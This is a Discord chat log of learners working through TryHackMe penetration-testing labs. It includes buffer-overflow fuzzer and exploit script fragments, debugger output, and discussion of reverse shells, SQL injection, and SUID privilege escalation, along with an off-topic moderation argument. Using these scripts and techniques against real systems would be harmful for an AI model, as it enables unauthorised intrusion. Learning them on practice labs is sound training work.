btw would u mind sharing y do u feel so?

zap is open source, and bup has some limit because it's the free version,,

Because hydra isn't suited to the task.

Hydra is ideal for simpler HTTP brute force or other servers.

alright!

💯

do u recommend brute forcing username as well or admin might work, I am asking with respect to squirrelmail specifically in case u have brute forced there before?

@keen iris

and whenever credentials r required in such cases, is brute force the only way to step ahead?

I did that, but ended up getting the same error about not finding the server. I guess I'll try again and see if it works.

hey, does anybody know how to do priv esc with wildcard injection through mv command?

Is this related to tryhackme? @brave idol

jus curious, can i start oscp path with basic networking and linux knowledge. or is it better to start with complete beginner then oscp?

Room Steel Mountain
Exploiting without Metasploit
I can not run server over port 80 since it is being used by another service, is there any way to get around it.

had a hell of a time with that, openvpn, or change the serving port ,

Openvpn is a waste of time
What about changing the serving port

Knowing that my exploit has a predefined port for the server which 80

Openvpn is a waste of time
What about changing the serving port

OpenVPN isn't a waste of time.

@keen iris blocked in my country, that is what i meant

You can change the port in the exploit if you take a minute to understand what is happening

It all about http mentioned in the .py@keen iris

I will say it again

You can change the port in the exploit

BUT you have to understand the URL it's building.

there is another way ,, wmic that requires no upload

@keen iris ok thanks i will give it a try@velvet tapir

prefix = "OVERFLOW1 "
offset =|| XXXX||
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")
except:
print("Could not connect.")

Restart oscp.exe in Immunity and run the modified exploit.py script again.
The EIP register should now be overwritten with the 4 B's (e.g. 42424242).

not sure how to confirm this, the log shows,,, is this correct?

Log data, item 0
Address=42424242
Message=[12:15:05] Access violation when executing [42424242]

@keen iris is there something wrong with my command?

Why ping me here?

since this repo was from your account...

Yeah no

I never converted it to python3

got it...thanks

It's not my exploit

yeah, i saw this

anyways it's awesome.

It worked for me sir.....still if it isn't finished, would you mind sharing what's missing?

Hey everyone! I've recently completed DailyBugle but I used joomblah (https://github.com/NinjaJc01/joomblah-3.git) to fetch username and password. Has anyone done that part manually? I tried using payloads as per https://www.exploit-db.com/exploits/42033 and got this info but didn't really understand it. Has anyone else visited this endpoint?

use sqlmap buddy

@fleet wedgeThanks for answering sir, but since it isn't allowed in oscp, I am looking for a manual way of doing it. Have you come across any?

Oh so you are practising for oscp

I'm just here to gain knowledge and modifying some scripts

ill look into the script 🙂

I am actually a beginner 😅 but still trying both methods where ever possible.

That's great if you not using any automating tools 🙂

Yeah, that's way more satisfying 😄

Ill suggest to look into the sqlmap script and try modifying the joomla script as per your need

Ok sure! I'll try that. Thanks 🙏

most cve doesn't work for me lmao

Same here 😅

i have to modify it everytime

;_;

Yeah, that sounds cool! How good are your coding skills btw?

Is this correct?

Nah i'm a script kiddie lmao

i have to google up everything (most of the things 😁 )

but modifying scripts is helping me improve

I don't if i should put my modified scripts on github

Yeah, actually this was written as per python and I used python3 so it's throwing errors.

nah im talking about ip address

i think you have to change it manually

use python with required modules installed using pip or pip3

No it's not of my machine

But I have to see what is it referring to.

you have to change the ip address in the script manually ig

Oh, but it worked fine with python

I don't really know how... But for the manual part, I'll go in depth

and it's Joomla CVE

is your box using Joomla or something?

It won't work on everybox

Yeah! DailyBugle

Oh!

yea so try changing the ip in the script

Alright let me try!

this is the output without changing anything

ig it's working

I was just checking the script

Didn't found any problem ig, it should work

Well it worked @low knot 😁

It's a hash if im correct

try decoding it

Yeah it's working. I think there's a misunderstanding

yea

joomblah was working before

oh my bad

lmao

I am done with this machine

apologies for my dumb brain

by using joomblah

it's okay...lol

and now I am looking for a manual method.

since, joomblah automated the process

IF the script worked, now try reading the script and understand it

What did it do

Yeah I am doing that

i haven't started with buffer overflows 🥲

Same here🥴

3 machines are yet to be done before starting them........

Hello everyone, starting this path now. 🙂

can someone tell me some offensive techniques of pentesting

? @past escarp

typing really hard and really fast on your keyboard

don't know what exactly do u mean by techniques but personally I feel being a good reader would really help me. I feel lazy reading lengthy blogs but as I am leveling up, finding videos on core concepts is rare n so reading becomes mandatory in the long run.
In case u turn out to be a voracious reader, kindly ignore....lol

i haven't seen any1 doing the windows priv esc room

:0

i just realized that exists and gives a badge lmfao

Days of reading and learning and practicing guaranteed: https://book.hacktricks.xyz

I love Hacktricks

hello
can someone reference me source of some windows internals for a behavior regarding the Alfred room ?
I don't know how much detail is OK to say here

Well we need enough information to know what you want to know

Coming from OSCP-style labs and don't know the actual policy regarding spoilers 😄
but i'll be more specific:
how does windows work with files regarding primary/impersonating tokens?

Urgh that's a mess

i tested and impersonated Admins group, getuid returned system account

but i still couldn't see files

https://www.exploit-db.com/papers/42556 Ashu linked this one previously

there is info about backup files and restore files there, but the actual directory content listing is not mentioned

I don't get Access denied , like I thought I would

but rather File Not Found

Yeah, it acts like the file doesn't exist

You don't have permissions to even know the existence

I'm trying to understand the difference between access denied and file (or any other object) does not exist

Well, one of them is you're not allowed to do what you're doing

Transparently, I get 2 different GetLastError() codes

The other is you're not even allowed to know the existence

(Or it actually doesn't exist)

is there any way to check what i am not allowed to know of ?

that is, before I privesc into a process with god primary token

not even icacls works

this lab helped me learn about some stuff I wasn't aware of before, but know I'm trying to get around to understand it

Surely that'd mean you know if it then?

I think the paper I linked might be helpful

i'll have a more thorough read and come back if I can't find the answer there or somewhere else
thank you for your time 🙂

Hi guys, i started the complete beginner path and reached the windows active directories, what would you recommend:
1-Doing AD then complete the intro to windows
2-Doing the windows intro, then AD, even if it's not part of the path

2

Im on Task 3 of vulnversity, Is this running alright?

@fleet wedge yes however rockyou is a password wordlist, not a wordlist for directory brute forcing

ohhh

Where do you find ones for directories?

You can probably research that quite quickly

Yep got one

Well i think its one lmao

Thanks for your help appreciate it

Hi can anyone help me out with bufferoverflow

buffer overflow*

i am unable to get the reverse shell

Where are you getting that error?

what is the problem

I am having problem here. Doing Vulnversity Walkthrough and got stuck on netcat and reverse shell

error msg WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

What IP did you put in the reverse shell?

my thm ip

that was shown on 10.10.10.10

Are you using a Kali VM?

yap

Connect to the VPN directly from Kali, not from the host OS.

ahh great

now its working

my thoughts were bad

so now everytime when i want to be on thm i need host OS connected to VPN and VM too?

No.

JUST in the VM.
ONLY in the VM.

You cannot connect from multiple devices at once.

oke, understood

thanks for fast response helper

Please don't call me bro. It's uncomfortable because you don't know me.

changed 😉

and sorry

I'm just starting on this path and I'm wanting to know if you guys have any advice at all or like somethings I could do to get better

the path takes pretty good care of you but it is always nice to go through some of the other training rooms that introduce tools like burpsuite, nmap, wireshark etc. as this knowledge will come in handy when you get to some of the more difficult rooms in the path

The PTS is free! Good resource

I will say THM’s paths feel miles ahead of its competitors in terms of learning.

THM is excellent for beginners and learning the basics but there's plenty of other resources out there too, that, in my opinion, are better for testing your overall skills

Sorry, that came out harsh. THM is excellent in almost every aspect. I just mean as a testing/validation platform, theres a few others out there that sit a bit better.

Don't limit yourself to just THM.

Good point bro

Please don't call me bro. It's uncomfortable as you don't know me.

We need a bro bot counter with standard reply

Never heard anyone have a problem with being called bro before.

Is it some kind of meme that i'm not aware of?

No. It's just a term you use for people who are like a brother to you. Or at least someone you know at a bare minimum. And that's without getting started on how it's often levelled at women.

I feel like you're probably reacting a little bit too strongly to this.

I feel like I'm asking you not to do something and that you should respect that?

what are you even on about? the guy simply thanked you

I respect you asking me, doesn't mean i'm going to do it.

Hey @barren beacon Please respect peoples choices to how they like or don't like to be addressed 🙂

Please don't call me krsecurity, call me bro.

That seems to be a sarcastic response, C'mon lets be civil here.

I was perfectly civil to be fair, and yes trolling a little, sorry for that. Just seemed weird for James to get all touchy about a singular word.

Well, It's not the word, per-se its the familiarity that it implies.

And James isn't 'touchy', He explained why and was polite about it.

Anyway, this is probably the worst conversation i've ever been a part of so i'm going to bow out and get back to work.

Good to hear it. Good luck with your work 🙂

Why are grown men being triggered by words like bro?

the guy simply thanked you

I was wondering when you'd finally press enter, Ugi 🙂

As you can see, it was all explained above.

And we have now moved on.

My point Esqy is that him being offended is his problem, not mine

You can't spend your whole life objecting to social normality

Ok.

I'm just surprised that such meaningless words can actually upset you? There bigger obstacles and hardships in life then getting called bro

Well, that c word is one I don't like.

just comes off very unprofessional

-warn @barren beacon Please don't use such foul language

⚠ Warned krsecurity#1598

Ugi - As does arguing over an issue that you have 0 vested interest in.

this is borderline pathetic

you're filtering people who disagree with you, rather than discussing the point raised

Let's calm down here please 🙂
@proper condor please remember that the staff in here are volunteers, not professionals. They don't have to accept being addressed in ways that they feel uncomfortable with. We would address you the way you wished to be referred to, so please afford others the same courtesy.

It's a mark of respect to not go against someone's wishes when it comes to how you speak to them. That is a valuable lesson to learn for the real world as well, for the record

Thank you for the valuable lesson, but you're in no position to be giving life advice especially when this chat seems to be ran by highschool kids with no practical life experience. What's next? If I disagree with you you'll mute/ban me too?

Wow. That is a lot to unpack right there. There are some assumptions in that block of text which are frankly laughable, and say a lot more about yourself than they do anyone else here 🙂
But no. Believe it or not I'm not a big fan of "punishing" people. If you want to cause a disturbance then sure -- my job is to maintain the peace in here. If you want to be an arsehole then maybe you'll end up banned; but that's not something that happens for disagreeing with someone.

You got something to say me to drop a PM, thicker skin is paramount in life, maybe it isn't when you're simply hiding behind your mod status

Are you ok?

Perfectly fine, are you?

Grand, thank you for asking 🙂

Yeah, I'm great 🙂

what do you guys do

out of curiosity

uni?

I'm an ethical hacking student working as a pentester. Esqy has a more interesting set of roles which I'm sure he'll tell you 😆

Personally? My family own and run several large businesses and I provide support in the form of HR, PR, Maintainance and all sorts of other things. In my spare time, I convert vans into campervans and build cool retro arcade machines. THM and Hacking is a side-hobby, which Is continued from my computer degree and years as a Digital Forensic Analyst

life outside your bedroom will throw bigger challenges at you, than getting called bro, I'm ex mil, you wanna give me a shout we can chat and discuss outlook on life and overall philosophy, I wish you all the best folks, but this whole bro fiasco portrays you in a very negative light

Enjoy your evenings

I'm up for booty calls whenever you need help, take care

👋

Ah. I see you mde assumptions about us. You are correct to a point. However, As an ex-military person, it surprises me that someone choosing how they want to be addressed has triggered you in such a way as to have this outpouring on a Discord. Hence why I asked if you were ok.

when you have weak people in position of power, its only a matter of time till that power gets abused

And that statement was crafted to offend.

no

its the truth

anyhow, You said you were off, so I won't take up any more of your time 🙂

ask anyone in police service/firefighters or army

you'll receive the same response

I'm available anytime, if u do wanna chat

take good care of yourself

Oh get lost you, get off your high horse and have a real conversation

I banned him, that conversation reeked of immaturity and veiled conceited beliefs on their end

You got this! And more importantly have fun! @near ginkgo

goodluck

How well would people say this path preps people for the OSCP?

something I would like to know too ^^

It prepares you for offensive security (as a practice) in general, it's not related or specifically geared towards OSCP.

Looks like fun convo, I’m NEW NEW so hi everybody ( i have been playing with Kali and Friends for awhile)

The Penetration Testing Student learning path on INE right?

but it's not free

-undelete -a

@chrome valve

Generally best to avoid social media during your exam tho.

Buffer Overflow Prep - Overflow1 - the !mona findmsp -distance doesn't work. Am I doing something wrong? Or is the exercise noted/instructions out of date?

It doesnt return any EIP value

it should work, that should give you your offset variable,

@queen solstice

But it isnt

are you looking at your log

its not displaying any of the content it should

yes, I'm looking at the log and the output screen as well

should look like this:

0BADF00D !mona findmsp -distance 2400
0BADF00D [+] Looking for cyclic pattern in memory
750C0000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x018bf272 (length 2400 bytes)
0BADF00D Cyclic pattern (normal) found at 0x007e394a (length 2400 bytes)
0BADF00D Cyclic pattern (normal) found at 0x007e4d7a (length 2400 bytes)
0BADF00D [+] Examining registers
0BADF00D EIP contains normal pattern : 0x6f43396e|| (offset 1978)||
0BADF00D ESP (0x018bfa30) points at offset 1982 in normal pattern (length 418)
0BADF00D EBP contains normal pattern : 0x43386e43 (offset 1974)
0BADF00D EBX contains normal pattern : 0x376e4336 (offset 1970)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack (+- 2400 bytes) - looking for cyclic pattern
0BADF00D Walking stack from 0x018bf0d0 to 0x018c0394 (0x000012c4 bytes)
0BADF00D 0x018bf274 : Contains normal cyclic pattern at ESP-0x7bc (-1980) : offset 2, length 2398 (-> 0x018bfbd1 : ESP+0x1a2)
0BADF00D [+] Examining stack (+- 2400 bytes) - looking for pointers to cyclic pattern
0BADF00D Walking stack from 0x018bf0d0 to 0x018c0394 (0x000012c4 bytes)
0BADF00D 0x018bf168 : Pointer into normal cyclic pattern at ESP-0x8c8 (-2248) : 0x018bf7a0 : offset 1326, length 1074
0BADF00D [+] Preparing output file 'findmsp.txt'
0BADF00D - Creating working folder c:\mona\oscp
0BADF00D - Folder created
0BADF00D - (Re)setting logfile c:\mona\oscp\findmsp.txt
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D
0BADF00D [+] This mona.py action took 0:00:06.037000

nope

I get this from the logfile

run the py again, something got out of whack, best to start again,, making sure all steps, are executing,

i can fizz the app

i'm not that far ahead of you, it's not hard just a lot of little steps,

i bought this to help with my oscp but this is turning out to be as frustrating as the oscp

i can fuzz the app

i've got the length plus 400 (i.e. 1700) for pattern create

but something appears wrong with mona

it looks for cyclical patterns in memory

the goes straight to examining registers

the straight to examining SEH chain

then asks if I'm connected to an application despite it listing the oscp app!

I've even disconnected from both the windows 7 box and the attack box but the same result

The distance should be the same for overflow1, which crashes at 2000,

mine stopped at 1300

just re-ran it (copied direct from the page) and it stops at 1300

ip = "10.10.209.186"
port = 1337
timeout = 5

buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)```

I'll try that

You've lost all the indents

@velvet tapir wrap it in three backticks on either side

i don't understand, forgot about the import backticks

Google "code blocks in discord"

I'm now going backwards

it now only sends 100 bytes before it loses the connection

but i can still nc to it

sorry about the code thing, python is all about indentation, prefer old fashion ;

its not that

i think it was the attack machine itself

Where you using python 2 oe 3?

ive just used the kali one andth fuzzer crashed at 2000 bytes

For the attackbox you need to use python2 as your command

i was using python2

python or python2?

and the eip on the win7 box has 41414141 in the eip

much of the oscp still runs on python2 so just assumed the same here

let me test the exploit.py

and exploit.py works

and !mona findmsp -discover works

-max and NinjaJc01 | James thanks for all your help and patience

ohhh,

I have been using python

so, in OVERFLOW3, if the fuzzer crashes at 700, made payload at 1100, and it's not crashing the server, is it ok to just say bring it up to 1200?

yep

my experience from oscp is to just keep uppoing the buffer til you get a crash

much like nop sleds you got to try trial and error to find the exact match

a bit like bad chars, though i like the mona way of discovering them, looks much more efficient

exercise one completed OK, I'll bear in mind the lessons from today - thanks once again for your help

yay just finalized the path

as somebody who knows nothing abt nothing

would doing complete beginner path -> this path be a good roadmap?

Pretty decent. Don't be afraid to go off the path and do some rooms that seem interesting tho

I'd do complete beginner, some easy challenge rooms, then this path

ok thanks, sounds good

im glad i found this site

So the tool I was using today gave me 2 interesting outputs on websites I was testing. Both were similar DOM based exploits. Would it be the api or the webpage itself that would be susceptible to attacks in that instance?

Hi, does anyone know why my buffer overflow attack pops shell in a THM machine but not when fuzzing in immunity debugger? I've set my AV to ignore immunity debugger and the relevant exe but it didn't help. Thanks!

Hello guys
So I've just passed my eJPT, and I am planning for the OSCP
I will purchase 3 months PWK lab access during the summer holiday, so what it the best thing I can do now as a preparation for the OSCP exam?

Shall I do Dante pro lab or the machines on the TJ_Null list?

My prep list is pinned in the channel. Add Gatekeeper, Relevant, and Internal to it.

I'm having chmod issues, can't seem to get the right privileges

-rwSr-Sr-x

You're missing execute on it

yes the most important one lol

that last x right

The letters rwxXst select file mode bits for the affected users: read (r), write (w), execute (or search for directories) (x), execute/search only if the
file is a directory or already has execute permission for some user (X), set user or group ID on execution (s), restricted deletion flag or sticky bit (t).
Instead of one or more of these letters, you can specify exactly one of the letters ugo: the permissions granted to the user who owns the file (u), the per‐
missions granted to other users who are members of the file's group (g), and the permissions granted to users that are in neither of the two preceding cate‐
gories (o).

this is just not very readable

I don't get it, have the file as root, put the +s flag as instructed , and like i'm missing a certain something

Yeah, you're missing execute on it

it's rw- rn

Needs to be rwx

got this, but lost the capital S,,,,

Good

You don't want the capital S

Capital S means suid without execute which is useless on a binary

It's fine now.

i was just about to google that SUID S,,,

ohhhh, so capital S bad

thank you sir

why ohhh why am I not root?????????

😫

it doesn't have suid permissions

ohhhhh i think i'm having a good moment

lol

ok, so I thought that when I execute the bash file that would change the user to root, terribly confused ,

Yeah it will. If the permissions are correct.

Because it needs to be a suid binary

so i did all the permission chmod stuff in my box and then uploaded the file, It sounds like I should have done that in the mount file,

Yeah.

thank you for like the ,,, lost track,

So I have recently got into this cyber-security field and I'm loving it. I've been on tryhackme for about more than a week but whenever I try to do a ctf room by myself without any help I always get stuck. Then I got to look up a walk through on youtube so I can solve the room I'm in. Could I get some tips to like help me with this. I do a nmap scan, then I look for hidden directories with gobuster, and then look around the webpage and try to exploit it and I usually find the first flag but then there's like two or three more after that and I always get stuck on that. Could I get some tips on that too please.

Check out gtfobins and lolbas for privilege escalation.

alright thank you 🙂

Is premium worth it?

Considering the other day I couldn’t even ssh into a host

Were you connected to the THM VPN?

OpenVPN?

Yeah. That's something you'll need in order to interact with room VMs. That, or interact from the attackbox.

Oh, it doesn't mention that in the Linux Fundamentals Part 2

It just says to SSH

It's a fundamental thing that applies all over THM. Something that was covered in the Welcome room which you were put into when you joined

oh okay

thanks

FWIW I think subscribing is worth it. The learning paths are pretty cool if you're starting out, the extra VM resources make everything smoother, the attackbox is useful if you don't have your own kali or don't want to mess with it, and the sub only content's pretty neat.
Full disclaimer: I'm loosely employed by THM for some of the box dev work I do. I don't get paid for people who subscribe, but I have made some of the content that features in paths, event rooms, and some sub only rooms

Nice, I think I will subscribe

Plus, it's faaar cheaper than HTB

And looks better

Plus you get your own instances. You need HTB VIP+ for that over on HTB.

Any idea why in the Alfred Room my meterpreter shell won't load? As you can see the session opens then nothing happens no prompt. If I hit enter it just says shell session closed. https://prnt.sc/10iykyy

Does your payload in multi/handler match the one that you generated?

rip looks like I didn't specify a module. Thanks.

Payload, not module. The module is multi handler

Hmmm. Payload is wrong I think. Generic not windows reverse_tcp

yea

Thank you. Working now.

Just needs to line up with what you generated

The command from the room didn't work so I just launched the module and set options on my own. Didn't even think about payload. Good lesson I learned for sure. Thanks again. Might have spent hours trying to figure it out. 🤦

Why no root.txt? Tells me right where it is but it isn't there.
https://prnt.sc/10iz5xl
https://prnt.sc/10iz6hh

Also confused why I can't launch a shell. When I type shell it just says channel created but I don't get command prompt.

You need to migrate to a process that has privs to see the file

Windows tells your process the file doesn't exist if you don't have perms to know of its existence

Oh yeah I forgot about the spool migrattion.

getuid shows me as system though so do I still need to migrate process?

You're system, but your primary token isn't

It's weird, I know

Okay. I'm not sure I totally understand that but I can read about it. Yeah I am impersonating system. Thanks again for your help. Much appreciated. I probably am pushing to hard to advance and need more basics but I tend to learn best by doing. A few months back I had never really even used linux and feel much more comfortable now.

I don't really understand the $ operator

I'll try my best;
Essentially the $ operator indicates a variable. If you run env it should spit out a bunch of variables with values (VARIABLE=VALUE).
Using the $ operator you can load in a value by its assigned variable name. For example if VAR=ABC123 and you do echo $VAR, then rather than printing out $VAR it will be replaced with ABC123.

A useful case for this is if you need to know what user you are, the USER variable is always set to the user you're currently logged in as, so $USER will always be replaced by your current username.

Ah okay

But what if I changed user=uendjdndj

I am on Blue - I have exploited it it via METASPLOIT. I am trying to exploit it manually. There are loads of instructions online. I have got teh python file. I have ran a a pipe peramiter scanner agaisnt it but nothing is returning

I have done a manual one and one on METEASPLOIT

I need it for the python script

any advice?